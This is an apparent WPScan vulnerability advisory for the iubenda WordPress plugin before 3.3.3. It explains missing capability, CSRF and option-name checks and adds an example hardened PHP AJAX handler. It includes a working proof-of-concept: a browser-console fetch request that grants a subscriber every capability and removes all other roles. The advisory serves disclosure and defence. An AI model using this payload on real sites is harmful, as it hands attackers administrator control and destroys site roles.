WPVDB-ID: C47FDCA8-74AC-48A4-9780-556927FB4E52
Krzysztof Zajac (wpvulndb)
Dec 12, 2022 - 12:00 a.m.

iubenda < 3.3.3 - Subscriber+ Privileges Escalation to Admin

wpscan.com
iubenda plugin
privileges escalation
csrf protection

EPSS: 0.001 (Low), Percentile: 26.7%

The plugin does not have authorisation and CSRF checks in an AJAX action, and does not ensure that the options to be updated belong to the plugin, as long as their values are arrays. As a result, any authenticated user, such as a subscriber, can grant themselves any capabilities, such as edit_plugins etc.

PoC

Run the command below in the developer console of the web browser while logged in to the blog as a subscriber. It grants all capabilities to the subscriber role and removes the other roles completely:

fetch('/wp-admin/admin-ajax.php?action=ajax_save_options', {
  method: 'POST',
  headers: { 'content-type': 'application/x-www-form-urlencoded' },
  body: 'iubenda_section_name=wp_user_roles&wp_user_roles[subscriber][name]=Subscriber&wp_user_roles[subscriber][capabilities][switch_themes]=true&wp_user_roles[subscriber][capabilities][edit_themes]=true&wp_user_roles[subscriber][capabilities][activate_plugins]=true&wp_user_roles[subscriber][capabilities][edit_plugins]=true&wp_user_roles[subscriber][capabilities][edit_users]=true&wp_user_roles[subscriber][capabilities][edit_files]=true&wp_user_roles[subscriber][capabilities][manage_options]=true&wp_user_roles[subscriber][capabilities][moderate_comments]=true&wp_user_roles[subscriber][capabilities][manage_categories]=true&wp_user_roles[subscriber][capabilities][manage_links]=true&wp_user_roles[subscriber][capabilities][upload_files]=true&wp_user_roles[subscriber][capabilities][import]=true&wp_user_roles[subscriber][capabilities][unfiltered_html]=true&wp_user_roles[subscriber][capabilities][edit_posts]=true&wp_user_roles[subscriber][capabilities][edit_others_posts]=true&wp_user_roles[subscriber][capabilities][edit_published_posts]=true&wp_user_roles[subscriber][capabilities][publish_posts]=true&wp_user_roles[subscriber][capabilities][edit_pages]=true&wp_user_roles[subscriber][capabilities][read]=true&wp_user_roles[subscriber][capabilities][level_10]=true&wp_user_roles[subscriber][capabilities][level_9]=true&wp_user_roles[subscriber][capabilities][level_8]=true&wp_user_roles[subscriber][capabilities][level_7]=true&wp_user_roles[subscriber][capabilities][level_6]=true&wp_user_roles[subscriber][capabilities][level_5]=true&wp_user_roles[subscriber][capabilities][level_4]=true&wp_user_roles[subscriber][capabilities][level_3]=true&wp_user_roles[subscriber][capabilities][level_2]=true&wp_user_roles[subscriber][capabilities][level_1]=true&wp_user_roles[subscriber][capabilities][level_0]=true&wp_user_roles[subscriber][capabilities][edit_others_pages]=true&wp_user_roles[subscriber][capabilities][edit_published_pages]=true&wp_user_roles[subscriber][capabilities][publish_pages]=true&wp_user_roles[subscriber][capabilities][delete_pages]=true&wp_user_roles[subscriber][capabilities][delete_others_pages]=true&wp_user_roles[subscriber][capabilities][delete_published_pages]=true&wp_user_roles[subscriber][capabilities][delete_posts]=true&wp_user_roles[subscriber][capabilities][delete_others_posts]=true&wp_user_roles[subscriber][capabilities][delete_published_posts]=true&wp_user_roles[subscriber][capabilities][delete_private_posts]=true&wp_user_roles[subscriber][capabilities][edit_private_posts]=true&wp_user_roles[subscriber][capabilities][read_private_posts]=true&wp_user_roles[subscriber][capabilities][delete_private_pages]=true&wp_user_roles[subscriber][capabilities][edit_private_pages]=true&wp_user_roles[subscriber][capabilities][read_private_pages]=true&wp_user_roles[subscriber][capabilities][delete_users]=true&wp_user_roles[subscriber][capabilities][create_users]=true&wp_user_roles[subscriber][capabilities][unfiltered_upload]=true&wp_user_roles[subscriber][capabilities][edit_dashboard]=true&wp_user_roles[subscriber][capabilities][update_plugins]=true&wp_user_roles[subscriber][capabilities][delete_plugins]=true&wp_user_roles[subscriber][capabilities][install_plugins]=true&wp_user_roles[subscriber][capabilities][update_themes]=true&wp_user_roles[subscriber][capabilities][install_themes]=true&wp_user_roles[subscriber][capabilities][update_core]=true&wp_user_roles[subscriber][capabilities][list_users]=true&wp_user_roles[subscriber][capabilities][remove_users]=true&wp_user_roles[subscriber][capabilities][promote_users]=true&wp_user_roles[subscriber][capabilities][edit_theme_options]=true&wp_user_roles[subscriber][capabilities][delete_themes]=true&wp_user_roles[subscriber][capabilities][export]=true&wp_user_roles[subscriber][capabilities][administrator]=true&wp_user_roles[subscriber][capabilities][manage_network_users]=true&wp_user_roles[subscriber][capabilities][manage_network_plugins]=true&wp_user_roles[subscriber][capabilities][manage_network_themes]=true&wp_user_roles[subscriber][capabilities][manage_network_options]=true&wp_user_roles[subscriber][capabilities][create_sites]=true&wp_user_roles[subscriber][capabilities][delete_sites]=true&wp_user_roles[subscriber][capabilities][manage_network]=true&wp_user_roles[subscriber][capabilities][manage_sites]=true&wp_user_roles[subscriber][capabilities][upload_plugins]=true&wp_user_roles[subscriber][capabilities][upload_themes]=true&wp_user_roles[subscriber][capabilities][upgrade_network]=true&wp_user_roles[subscriber][capabilities][setup_network]=true',
}).then(response => response.text()).then(data => console.log(data));
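The advisory names three missing controls in the plugin's AJAX handler: no capability check, no CSRF nonce, and no restriction on which option name the request may write (which is why a subscriber can target the core wp_user_roles option). The handler below is an added example written for this page, not the iubenda plugin's own code or its fix; the hook name example_save_options, the request field example_section_name, the nonce action string and the option allowlist are all assumptions. It shows the shape a safe options handler takes under the wp_ajax_ hook:

```php
<?php
// Added example (not the plugin's code): a hardened AJAX options handler that
// applies the three checks the advisory reports as missing. All names here
// (hook, request fields, nonce action, allowed option names) are assumed.

add_action( 'wp_ajax_example_save_options', 'example_save_options' );

function example_save_options() {
    // 1. Authorisation: only users who may manage options reach the write.
    //    wp_send_json_error() ends the request, so no return is needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF: require a nonce bound to this action, sent in the `nonce`
    //    field. check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'example_save_options', 'nonce' );

    // 3. Allowlist: only the plugin's own option names may be written. A
    //    request naming wp_user_roles (or any other core option) is refused
    //    regardless of who sends it or whether the value is an array.
    $allowed = array( 'example_plugin_settings', 'example_plugin_banner' );
    $section = isset( $_POST['example_section_name'] )
        ? sanitize_key( wp_unslash( $_POST['example_section_name'] ) )
        : '';
    if ( ! in_array( $section, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'unknown option' ), 400 );
    }

    // Accept only the array shape the plugin stores, and sanitise each leaf.
    $value = isset( $_POST[ $section ] ) ? wp_unslash( $_POST[ $section ] ) : null;
    if ( ! is_array( $value ) ) {
        wp_send_json_error( array( 'message' => 'invalid value' ), 400 );
    }
    $value = map_deep( $value, 'sanitize_text_field' );

    update_option( $section, $value );
    wp_send_json_success( array( 'updated' => $section ) );
}
```

The nonce is issued server-side with wp_create_nonce( 'example_save_options' ) and handed to the page's script (for instance via wp_localize_script), so a request built from another origin cannot supply a valid one. The allowlist is the check that matters most for this class of bug: even if the capability or nonce check were later weakened, a handler that only accepts its own option names cannot be turned into a write to wp_user_roles.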

CPE Name                      Operator   Version
iubenda-cookie-law-solution   lt         3.3.3
